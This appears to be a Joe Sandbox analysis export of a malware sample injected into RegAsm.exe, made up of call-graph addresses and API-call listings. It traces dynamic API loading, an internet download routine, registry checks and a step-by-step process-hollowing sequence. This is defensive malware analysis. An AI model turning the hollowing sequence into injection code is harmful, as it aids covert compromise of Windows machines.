436e90 ___scrt_get_show_window_mode 53976->53977 53978 434b27 GetStartupInfoW 53977->53978 53979 434968 53978->53979 53980 4441a2 53979->53980 54329 44f059 53980->54329 53982 434971 53985 40e9c5 53982->53985 53983 4441ab 53983->53982 54333 446815 36 API calls 53983->54333 54463 41cb50 LoadLibraryA GetProcAddress 53985->54463 53987 40e9e1 GetModuleFileNameW 54468 40f3c3 53987->54468 53989 40e9fd 53990 4020f6 28 API calls 53989->53990 53991 40ea0c 53990->53991 53992 4020f6 28 API calls 53991->53992 53993 40ea1b 53992->53993 53994 41be1b 28 API calls 53993->53994 53995 40ea24 53994->53995 54483 40fb17 53995->54483 53997 40ea2d 53998 401e8d 11 API calls 53997->53998 53999 40ea36 53998->53999 54000 40ea93 53999->54000 54001 40ea49 53999->54001 54002 401e65 22 API calls 54000->54002 54678 40fbb3 118 API calls 54001->54678 54004 40eaa3 54002->54004 54008 401e65 22 API calls 54004->54008 54005 40ea5b 54006 401e65 22 API calls 54005->54006 54007 40ea67 54006->54007 54679 410f37 36 API calls __EH_prolog 54007->54679 54009 40eac2 54008->54009 54011 40531e 28 API calls 54009->54011 54013 40ead1 54011->54013 54012 40ea79 54680 40fb64 78 API calls 54012->54680 54014 406383 28 API calls 54013->54014 54016 40eadd 54014->54016 54018 401fe2 28 API calls 54016->54018 54017 40ea82 54681 40f3b0 71 API calls 54017->54681 54020 40eae9 54018->54020 54021 401fd8 11 API calls 54020->54021 54022 40eaf2 54021->54022 54024 401fd8 11 API calls 54022->54024 54026 40eafb 54024->54026 54027 401e65 22 API calls 54026->54027 54028 40eb04 54027->54028 54029 401fc0 28 API calls 54028->54029 54030 40eb0f 54029->54030 54031 401e65 22 API calls 54030->54031 54032 40eb28 54031->54032 54033 401e65 22 API calls 54032->54033 54034 40eb43 54033->54034 54035 40ebae 54034->54035 54682 406c1e 54034->54682 54036 401e65 22 API calls 54035->54036 54042 40ebbb 54036->54042 54038 40eb70 54039 401fe2 28 API calls 54038->54039 54040 40eb7c 54039->54040 54043 401fd8 11 API calls 54040->54043 54041 40ec02 54487 40d069 
54041->54487 54042->54041 54048 413549 3 API calls 54042->54048 54045 40eb85 54043->54045 54687 413549 RegOpenKeyExA 54045->54687 54054 40ebe6 54048->54054 54052 40f34f 54780 4139a9 30 API calls 54052->54780 54054->54041 54690 4139a9 30 API calls 54054->54690 54062 40f365 54781 412475 65 API calls ___scrt_get_show_window_mode 54062->54781 54263->53933 54264->53946 54269->53960 54271 438f36 ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 54270->54271 54283 43a43a 54271->54283 54274 438f44 54274->53962 54276 438f4c 54277 438f57 54276->54277 54297 43a476 DeleteCriticalSection 54276->54297 54277->53962 54325 44fb68 54279->54325 54282 438f5a 8 API calls 3 library calls 54282->53967 54284 43a443 54283->54284 54286 43a46c 54284->54286 54287 438f40 54284->54287 54298 438e7f 54284->54298 54303 43a476 DeleteCriticalSection 54286->54303 54287->54274 54289 43a3ec 54287->54289 54318 438d94 54289->54318 54291 43a3f6 54292 43a401 54291->54292 54323 438e42 6 API calls try_get_function 54291->54323 54292->54276 54294 43a40f 54295 43a41c 54294->54295 54324 43a41f 6 API calls ___vcrt_FlsFree 54294->54324 54295->54276 54297->54274 54304 438c73 54298->54304 54301 438eb6 InitializeCriticalSectionAndSpinCount 54302 438ea2 54301->54302 54302->54284 54303->54287 54305 438ca3 54304->54305 54306 438ca7 54304->54306 54305->54306 54310 438cc7 54305->54310 54311 438d13 54305->54311 54306->54301 54306->54302 54308 438cd3 GetProcAddress 54309 438ce3 __crt_fast_encode_pointer 54308->54309 54309->54306 54310->54306 54310->54308 54312 438d3b LoadLibraryExW 54311->54312 54313 438d30 54311->54313 54314 438d57 GetLastError 54312->54314 54315 438d6f 54312->54315 54313->54305 54314->54315 54316 438d62 LoadLibraryExW 54314->54316 54315->54313 54317 438d86 FreeLibrary 54315->54317 54316->54315 54317->54313 54319 438c73 try_get_function 5 API calls 54318->54319 54320 438dae 54319->54320 54321 438db7 54320->54321 54322 438dc6 TlsAlloc 54320->54322 54321->54291 54323->54294 
54324->54292 54328 44fb81 54325->54328 54326 434fcb __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 54327 4345bd 54326->54327 54327->53965 54327->54282 54328->54326 54330 44f06b 54329->54330 54331 44f062 54329->54331 54330->53983 54334 44ef58 54331->54334 54333->53983 54335 448215 __Toupper 36 API calls 54334->54335 54336 44ef65 54335->54336 54354 44f077 54336->54354 54338 44ef6d 54363 44ecec 54338->54363 54342 44efc7 54345 446782 _free 20 API calls 54342->54345 54347 44ef84 54345->54347 54347->54330 54348 44efc2 54387 4405dd 20 API calls _free 54348->54387 54350 44f00b 54350->54342 54388 44ebc2 20 API calls 54350->54388 54351 44efdf 54351->54350 54352 446782 _free 20 API calls 54351->54352 54352->54350 54355 44f083 ___FrameUnwindToState 54354->54355 54356 448215 __Toupper 36 API calls 54355->54356 54358 44f08d 54356->54358 54359 44f111 ___FrameUnwindToState 54358->54359 54362 446782 _free 20 API calls 54358->54362 54389 4460f4 36 API calls 4 library calls 54358->54389 54390 445888 EnterCriticalSection 54358->54390 54391 44f108 LeaveCriticalSection std::_Lockit::~_Lockit 54358->54391 54359->54338 54362->54358 54364 43a7b7 __cftoe 36 API calls 54363->54364 54365 44ecfe 54364->54365 54366 44ed0d GetOEMCP 54365->54366 54367 44ed1f 54365->54367 54368 44ed36 54366->54368 54367->54368 54369 44ed24 GetACP 54367->54369 54368->54347 54370 446137 54368->54370 54369->54368 54371 446175 54370->54371 54375 446145 __Getctype 54370->54375 54393 4405dd 20 API calls _free 54371->54393 54373 446160 RtlAllocateHeap 54374 446173 54373->54374 54373->54375 54374->54342 54377 44f119 54374->54377 54375->54371 54375->54373 54392 442f80 7 API calls 2 library calls 54375->54392 54378 44ecec 38 API calls 54377->54378 54379 44f138 54378->54379 54382 44f189 IsValidCodePage 54379->54382 54384 44f13f 54379->54384 54386 44f1ae ___scrt_get_show_window_mode 54379->54386 54380 434fcb __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 54381 44efba 54380->54381 
54381->54348 54381->54351 54383 44f19b GetCPInfo 54382->54383 54382->54384 54383->54384 54383->54386 54384->54380 54394 44edc4 GetCPInfo 54386->54394 54387->54342 54388->54342 54389->54358 54390->54358 54391->54358 54392->54375 54393->54374 54395 44eea8 54394->54395 54401 44edfe 54394->54401 54398 434fcb __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 54395->54398 54400 44ef54 54398->54400 54400->54384 54404 45112c 54401->54404 54403 44ae66 _swprintf 41 API calls 54403->54395 54405 43a7b7 __cftoe 36 API calls 54404->54405 54406 45114c MultiByteToWideChar 54405->54406 54408 45118a 54406->54408 54415 451222 54406->54415 54410 446137 ___crtLCMapStringA 21 API calls 54408->54410 54416 4511ab __alloca_probe_16 ___scrt_get_show_window_mode 54408->54416 54409 434fcb __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 54411 44ee5f 54409->54411 54410->54416 54418 44ae66 54411->54418 54412 45121c 54423 435e40 20 API calls _free 54412->54423 54414 4511f0 MultiByteToWideChar 54414->54412 54417 45120c GetStringTypeW 54414->54417 54415->54409 54416->54412 54416->54414 54417->54412 54419 43a7b7 __cftoe 36 API calls 54418->54419 54420 44ae79 54419->54420 54424 44ac49 54420->54424 54423->54415 54425 44ac64 ___crtLCMapStringA 54424->54425 54426 44ac8a MultiByteToWideChar 54425->54426 54427 44acb4 54426->54427 54438 44ae3e 54426->54438 54430 446137 ___crtLCMapStringA 21 API calls 54427->54430 54434 44acd5 __alloca_probe_16 54427->54434 54428 434fcb __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 54429 44ae51 54428->54429 54429->54403 54430->54434 54431 44ad1e MultiByteToWideChar 54432 44ad37 54431->54432 54433 44ad8a 54431->54433 54451 448bb3 54432->54451 54460 435e40 20 API calls _free 54433->54460 54434->54431 54434->54433 54438->54428 54439 44ad61 54439->54433 54441 448bb3 _strftime 11 API calls 54439->54441 54440 44ad99 54443 446137 ___crtLCMapStringA 21 API calls 54440->54443 54446 44adba __alloca_probe_16 54440->54446 
54441->54433 54442 44ae2f 54459 435e40 20 API calls _free 54442->54459 54443->54446 54444 448bb3 _strftime 11 API calls 54447 44ae0e 54444->54447 54446->54442 54446->54444 54447->54442 54448 44ae1d WideCharToMultiByte 54447->54448 54448->54442 54449 44ae5d 54448->54449 54461 435e40 20 API calls _free 54449->54461 54452 4484ca __Toupper 5 API calls 54451->54452 54453 448bda 54452->54453 54455 448be3 54453->54455 54462 448c3b 10 API calls 3 library calls 54453->54462 54457 434fcb __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 54455->54457 54456 448c23 LCMapStringW 54456->54455 54458 448c35 54457->54458 54458->54433 54458->54439 54458->54440 54459->54433 54460->54438 54461->54433 54462->54456 54464 41cb8f LoadLibraryA GetProcAddress 54463->54464 54465 41cb7f GetModuleHandleA GetProcAddress 54463->54465 54466 41cbb8 44 API calls 54464->54466 54467 41cba8 LoadLibraryA GetProcAddress 54464->54467 54465->54464 54466->53987 54467->54466 54782 41b4a8 FindResourceA 54468->54782 54471 43bd51 new 21 API calls 54472 40f3ed ctype 54471->54472 54473 4020b7 28 API calls 54472->54473 54474 40f408 54473->54474 54475 401fe2 28 API calls 54474->54475 54476 40f413 54475->54476 54477 401fd8 11 API calls 54476->54477 54478 40f41c 54477->54478 54479 43bd51 new 21 API calls 54478->54479 54480 40f42d ctype 54479->54480 54785 406dd8 54480->54785 54482 40f460 54482->53989 54484 40fb23 54483->54484 54486 40fb2a 54483->54486 54788 402163 11 API calls 54484->54788 54486->53997 54789 401fab 54487->54789 54678->54005 54679->54012 54680->54017 54683 4020df 11 API calls 54682->54683 54684 406c2a 54683->54684 54685 4032a0 28 API calls 54684->54685 54686 406c47 54685->54686 54686->54038 54688 40eba4 54687->54688 54689 413573 RegQueryValueExA RegCloseKey 54687->54689 54688->54035 54688->54052 54689->54688 54690->54041 54780->54062 54783 41b4c5 LoadResource LockResource SizeofResource 54782->54783 54784 40f3de 54782->54784 54783->54784 54784->54471 54786 4020b7 28 API calls 
54785->54786 54787 406dec 54786->54787 54787->54482 54788->54486 55148 4269e6 55149 4269fb 55148->55149 55155 426a8d 55148->55155 55150 426a48 55149->55150 55151 426b44 55149->55151 55152 426abd 55149->55152 55153 426b1d 55149->55153 55149->55155 55159 426af2 55149->55159 55161 426a7d 55149->55161 55176 424edd 49 API calls ctype 55149->55176 55150->55155 55150->55161 55177 41fb6c 52 API calls 55150->55177 55151->55155 55181 426155 28 API calls 55151->55181 55152->55155 55152->55159 55179 41fb6c 52 API calls 55152->55179 55153->55151 55153->55155 55164 425ae1 55153->55164 55159->55153 55180 4256f0 21 API calls 55159->55180 55161->55152 55161->55155 55178 424edd 49 API calls ctype 55161->55178 55166 425b00 ___scrt_get_show_window_mode 55164->55166 55165 425b34 55165->55151 55166->55165 55168 425b0f 55166->55168 55182 41ebbb 21 API calls 55166->55182 55168->55165 55175 425b14 55168->55175 55183 4205d8 46 API calls 55168->55183 55171 425b1d 55171->55165 55186 424d05 21 API calls 2 library calls 55171->55186 55173 425bb7 55173->55165 55184 432ec4 21 API calls new 55173->55184 55175->55165 55175->55171 55185 41da5f 49 API calls 55175->55185 55176->55150 55177->55150 55178->55152 55179->55152 55180->55153 55181->55155 55182->55168 55183->55173 55184->55175 55185->55171 55186->55165 55187 415d06 55202 41b380 55187->55202 55189 415d0f 55190 4020f6 28 API calls 55189->55190 55191 415d1e 55190->55191 55192 404aa1 61 API calls 55191->55192 55193 415d2a 55192->55193 55194 417089 55193->55194 55195 401fd8 11 API calls 55193->55195 55196 401e8d 11 API calls 55194->55196 55195->55194 55197 417092 55196->55197 55198 401fd8 11 API calls 55197->55198 55199 41709e 55198->55199 55200 401fd8 11 API calls 55199->55200 55201 4170aa 55200->55201 55203 4020df 11 API calls 55202->55203 55204 41b38e 55203->55204 55205 43bd51 new 21 API calls 55204->55205 55206 41b39e InternetOpenW InternetOpenUrlW 55205->55206 55207 41b3c5 InternetReadFile 55206->55207 55210 41b3e8 55207->55210 55208 4020b7 
28 API calls 55208->55210 55209 41b415 InternetCloseHandle InternetCloseHandle 55211 41b427 55209->55211 55210->55207 55210->55208 55210->55209 55212 401fd8 11 API calls 55210->55212 55211->55189 55212->55210 55213 1000c7a7 55214 1000c7be 55213->55214 55219 1000c82c 55213->55219 55214->55219 55223 1000c7e6 GetModuleHandleA 55214->55223 55215 1000c872 55216 1000c835 GetModuleHandleA 55218 1000c83f 55216->55218 55218->55218 55218->55219 55219->55215 55219->55216 55224 1000c7ef 55223->55224 55231 1000c82c 55223->55231 55233 1000c803 55224->55233 55226 1000c835 GetModuleHandleA 55228 1000c83f 55226->55228 55227 1000c872 55228->55228 55228->55231 55231->55226 55231->55227 55234 1000c809 55233->55234 55235 1000c82c 55234->55235 55236 1000c80d VirtualProtect 55234->55236 55238 1000c872 55235->55238 55239 1000c835 GetModuleHandleA 55235->55239 55236->55235 55237 1000c81c VirtualProtect 55236->55237 55237->55235 55240 1000c83f 55239->55240 55240->55235 55241 426c4b 55246 426cc8 send 55241->55246 55247 42f8ed 55248 42f8f8 55247->55248 55250 42f90c 55248->55250 55251 432eee 55248->55251 55250->55250 55252 432ef9 55251->55252 55253 432efd 55251->55253 55252->55250 55255 440f0d 55253->55255 55256 446185 55255->55256 55257 446192 55256->55257 55258 44619d 55256->55258 55259 446137 ___crtLCMapStringA 21 API calls 55257->55259 55260 4461a5 55258->55260 55266 4461ae __Getctype 55258->55266 55265 44619a 55259->55265 55263 446782 _free 20 API calls 55260->55263 55261 4461b3 55268 4405dd 20 API calls _free 55261->55268 55262 4461d8 HeapReAlloc 55262->55265 55262->55266 55263->55265 55265->55252 55266->55261 55266->55262 55269 442f80 7 API calls 2 library calls 55266->55269 55268->55265 55269->55266 55270 434875 55275 434b47 SetUnhandledExceptionFilter 55270->55275 55272 43487a pre_c_initialization 55276 44554b 20 API calls 2 library calls 55272->55276 55274 434885 55275->55272 55276->55274 55277 44831e 55285 448710 55277->55285 55280 448332 55282 44833a 55283 448347 55282->55283 55293 
44834a 11 API calls 55282->55293 55286 4484ca __Toupper 5 API calls 55285->55286 55287 448737 55286->55287 55288 448740 55287->55288 55289 44874f TlsAlloc 55287->55289 55290 434fcb __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 55288->55290 55289->55288 55291 448328 55290->55291 55291->55280 55292 448299 20 API calls 3 library calls 55291->55292 55292->55282 55293->55280 55294 43be58 55297 43be64 _swprintf ___FrameUnwindToState 55294->55297 55295 43be72 55310 4405dd 20 API calls _free 55295->55310 55297->55295 55299 43be9c 55297->55299 55298 43be77 __cftoe ___FrameUnwindToState 55305 445888 EnterCriticalSection 55299->55305 55301 43bea7 55306 43bf48 55301->55306 55305->55301 55307 43bf56 55306->55307 55309 43beb2 55307->55309 55312 44976c 37 API calls 2 library calls 55307->55312 55311 43becf LeaveCriticalSection std::_Lockit::~_Lockit 55309->55311 55310->55298 55311->55298 55312->55307 55313 100020db 55314 100020e7 ___DestructExceptionObject 55313->55314 55315 10002110 dllmain_raw 55314->55315 55320 1000210b 55314->55320 55324 100020f6 55314->55324 55316 1000212a 55315->55316 55315->55324 55326 10001eec 55316->55326 55318 10002177 55319 10001eec 29 API calls 55318->55319 55318->55324 55321 1000218a 55319->55321 55320->55318 55323 10001eec 29 API calls 55320->55323 55320->55324 55322 10002193 dllmain_raw 55321->55322 55321->55324 55322->55324 55325 1000216d dllmain_raw 55323->55325 55325->55318 55327 10001ef7 55326->55327 55328 10001f2a dllmain_crt_process_detach 55326->55328 55329 10001f1c dllmain_crt_process_attach 55327->55329 55330 10001efc 55327->55330 55335 10001f06 55328->55335 55329->55335 55331 10001f01 55330->55331 55332 10001f12 55330->55332 55331->55335 55336 1000240b 25 API calls 55331->55336 55337 100023ec 27 API calls 55332->55337 55335->55320 55336->55335 55337->55335 55338 41dfbd 55339 41dfd2 ctype ___scrt_get_show_window_mode 55338->55339 55351 41e1d5 55339->55351 55357 432ec4 21 API calls new 55339->55357 55342 41e1e6 55350 

Control-flow Graph

APIs
• LoadLibraryA.KERNEL32(Psapi), ref: 0041CB65
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB6E
• GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB88
• LoadLibraryA.KERNEL32(shcore), ref: 0041CB9A
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB9D
• LoadLibraryA.KERNEL32(user32), ref: 0041CBAE
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBB1
• LoadLibraryA.KERNEL32(ntdll), ref: 0041CBC3
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBC6
• LoadLibraryA.KERNEL32(kernel32), ref: 0041CBD2
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBD5
• GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBE9
• GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBFD
• LoadLibraryA.KERNEL32(Shell32), ref: 0041CC0E
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC11
• GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC25
• GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC39
• GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC4D
• GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC61
• GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC75
• LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CC83
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC86
• LoadLibraryA.KERNEL32(kernel32), ref: 0041CC97
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC9A
• GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E9E1), ref: 0041CCA7
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCAA
• GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040E9E1), ref: 0041CCB7
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCBA
• LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CCCC
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCCF
• LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CCDC
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCDF
• GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040E9E1), ref: 0041CCF0
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCF3
• GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040E9E1), ref: 0041CD04
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD07
• LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD19
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD1C
• LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD29
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD2C
• LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD39
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD3C
• LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD49
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD4C
Strings
Memory Dump Source
• Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: AddressProc$LibraryLoad$HandleModule
• String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
• API String ID: 4236061018-3687161714
• Opcode ID: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
• Instruction ID: 43d5c3d51f8f0173c8b3474e0c84bdc355f07b7b5b23ff39ae26555794408ecb
• Opcode Fuzzy Hash: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
• Instruction Fuzzy Hash: 31419EA0EC035879DA107BB66DCDE3B3E5CD9857953214837B15CA7150EBBCD8408EAE

Control-flow Graph

APIs
• GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
• GetProcAddress.KERNEL32(00000000), ref: 00418139
• GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
• GetProcAddress.KERNEL32(00000000), ref: 0041814D
• GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
• GetProcAddress.KERNEL32(00000000), ref: 00418161
• GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
• GetProcAddress.KERNEL32(00000000), ref: 00418175
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
• VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
• GetThreadContext.KERNEL32(?,00000000), ref: 00418245
• ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 0041826B
• NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 00418293
• NtUnmapViewOfSection.NTDLL(?,?), ref: 004182BB
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 004182DB
• VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 004182ED
• NtClose.NTDLL(?), ref: 004182F7
• TerminateProcess.KERNEL32(?,00000000), ref: 00418301
• GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418341
• NtMapViewOfSection.NTDLL(?,00000000), ref: 0041834C
• WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041840B
• SetThreadContext.KERNEL32(?,00000000), ref: 00418428
• ResumeThread.KERNEL32(?), ref: 00418435
• VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041844C
• GetCurrentProcess.KERNEL32(?), ref: 00418457
• NtUnmapViewOfSection.NTDLL(00000000), ref: 0041845E
• NtClose.NTDLL(?), ref: 00418468
• TerminateProcess.KERNEL32(?,00000000), ref: 00418472
• GetLastError.KERNEL32 ref: 0041847A
Strings
Memory Dump Source
• Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Process$Section$AddressHandleModuleProcView$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmap$AllocErrorLastReadResumeWrite
• String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
• API String ID: 316982871-3035715614
• Opcode ID: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
• Instruction ID: 216cb1b436b1bb1c0a39989cd20dfb1fea14fcd849b5832ba41dfff5d3f22c39
• Opcode Fuzzy Hash: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
• Instruction Fuzzy Hash: EDA16E70604305AFDB208F64CC85BAB7BE8FF48705F04482EF595D6291EB78D844CB1A

Control-flow Graph

APIs
• lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
• lstrcatW.KERNEL32(?,?), ref: 10001151
• lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
• lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
• lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
• FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
• FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
• FindClose.KERNEL32(00000000), ref: 100011DB
Memory Dump Source
• Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
Similarity
• API ID: lstrlen$Find$File$CloseFirstNextlstrcat
• String ID:
• API String ID: 1083526818-0
• Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
• Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
• Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
• Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 00413549: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413569
                                                                          • Part of subcall function 00413549: RegQueryValueExA.KERNEL32 ref: 00413587
                                                                          • Part of subcall function 00413549: RegCloseKey.KERNEL32(?), ref: 00413592
                                                                        • Sleep.KERNEL32(00000BB8), ref: 0040F85B
                                                                        • ExitProcess.KERNEL32 ref: 0040F8CA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseExitOpenProcessQuerySleepValue
                                                                        • String ID: 5.0.0 Pro$`2U$override$pth_unenc
                                                                        • API String ID: 2281282204-970319588
                                                                        • Opcode ID: b93807ab3ce0d5bba4bd1ccb9a8b41d40f094000d2685bb717fd1cbe92334c8f
                                                                        • Instruction ID: 07d0e0dc4205ecb16ec703249a4fc897915f305b32a2beb09604d1d6565ffe0f
                                                                        • Opcode Fuzzy Hash: b93807ab3ce0d5bba4bd1ccb9a8b41d40f094000d2685bb717fd1cbe92334c8f
                                                                        • Instruction Fuzzy Hash: F821F371B0420167C604767A485B6AE35A95B80718F90403FF505676D7FF7C8E0583EF
                                                                        APIs
                                                                          • Part of subcall function 0041179C: SetLastError.KERNEL32(0000000D,00411D1C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 004117A2
                                                                        • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411D37
                                                                        • GetNativeSystemInfo.KERNEL32(?), ref: 00411DA5
                                                                        • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411DC9
